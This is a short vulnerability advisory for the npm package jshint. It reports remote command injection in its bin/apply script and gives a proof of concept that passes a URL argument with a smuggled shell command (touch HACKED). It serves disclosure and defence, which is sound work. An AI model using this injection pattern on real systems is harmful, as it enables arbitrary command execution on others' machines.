jshint

vulnerability remote code execution
severity 3.8
language javascript
registry npm

Description

The jshint package is vulnerable against RCE since user-supplied arguments are unsafely formatted inside a command and executed, leading to arbitrary command injection

POC

  1. Create the following PoC file:
// poc.js
var jshint = require("jshint/bin/apply");

  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
node poc.js 'https://eee.w.www.ww"; touch HACKED; #' #  Run the PoC ... you'll need to CTRL+C after some seconds

References